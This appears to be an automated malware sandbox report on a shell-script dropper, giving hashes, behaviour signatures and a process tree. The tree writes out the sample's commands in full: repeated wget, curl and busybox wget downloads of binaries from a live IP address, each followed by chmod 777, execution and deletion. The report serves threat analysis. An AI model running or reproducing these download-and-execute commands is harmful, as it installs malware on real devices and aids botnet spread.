Analysis
-
max time kernel
62s -
max time network
64s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
01-11-2024 02:29
Static task
static1
Behavioral task
behavioral1
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
-
Size
10KB
-
MD5
abfaa07509a98cf9d61a9ee03366064b
-
SHA1
29b8aa70ebe761df31582b1b62505f786b247305
-
SHA256
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29
-
SHA512
f075902543aeb6d5a01e97c8cde8c65e59b945c859a7b846c14d98263366506322b3b33a50f3dba6f4ab67698396cf4e90cf9ab26835c00dce9124844ed97329
-
SSDEEP
192:qJBElpvTXslVFDTABtsvA9tovAEdXjJJBElp9TXslVjVDTABtKy:8DTABtsvAHovAEdXjBDTABtKy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 820 chmod 883 chmod 889 chmod 973 chmod 877 chmod 931 chmod 937 chmod 745 chmod 814 chmod 955 chmod 827 chmod 738 chmod 766 chmod 871 chmod 907 chmod 949 chmod 855 chmod 919 chmod 925 chmod 967 chmod 751 chmod 793 chmod 895 chmod 901 chmod 961 chmod 913 chmod 943 chmod 979 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw 739 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 746 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 /tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px 752 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px /tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj 768 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj /tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc 794 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc /tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch 815 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch /tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT 821 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT /tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa 829 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa /tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE 856 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE /tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo 872 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 878 tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u 884 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD 890 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ 896 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 902 tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u 908 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD 914 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ 920 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw 926 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 932 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 /tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc 938 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc /tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch 944 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch /tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT 950 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT /tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa 956 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa /tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE 962 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE /tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo 968 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo /tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px 974 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px /tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj 980 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 819 busybox 821 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT 948 busybox 950 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT 951 rm 817 wget 818 curl 822 rm 946 wget 947 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD curl File opened for modification /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ curl File opened for modification /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u curl File opened for modification /tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo curl File opened for modification /tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT curl File opened for modification /tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo curl File opened for modification /tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc curl File opened for modification /tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj curl File opened for modification /tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT curl File opened for modification /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 curl File opened for modification /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ curl File opened for modification /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 curl File opened for modification /tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px curl File opened for modification /tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc curl File opened for modification /tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE curl File opened for modification /tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch curl File opened for modification /tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa curl File opened for modification /tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch curl File opened for modification /tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa curl File opened for modification /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 curl File opened for modification /tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE curl File opened for modification /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw curl File opened for modification /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 curl File opened for modification /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u curl File opened for modification /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD curl File opened for modification /tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px curl File opened for modification /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw curl File opened for modification /tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj curl
Processes
-
/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:737
-
-
/bin/chmodchmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:744
-
-
/bin/chmodchmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:750
-
-
/bin/chmodchmod 777 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px./FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:761
-
-
/bin/chmodchmod 777 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj./EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:787
-
-
/bin/chmodchmod 777 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc./11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:799
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:813
-
-
/bin/chmodchmod 777 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch./Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:817
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/chmodchmod 777 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT./K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:821
-
-
/bin/rmrm K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:822
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:825
-
-
/bin/chmodchmod 777 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa./weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:832
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:833
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:849
-
-
/bin/chmodchmod 777 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE./E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:870
-
-
/bin/chmodchmod 777 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo./k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:876
-
-
/bin/chmodchmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8./tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:882
-
-
/bin/chmodchmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:888
-
-
/bin/chmodchmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:894
-
-
/bin/chmodchmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:900
-
-
/bin/chmodchmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8./tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:906
-
-
/bin/chmodchmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:912
-
-
/bin/chmodchmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:918
-
-
/bin/chmodchmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:924
-
-
/bin/chmodchmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:930
-
-
/bin/chmodchmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:936
-
-
/bin/chmodchmod 777 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc./11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:939
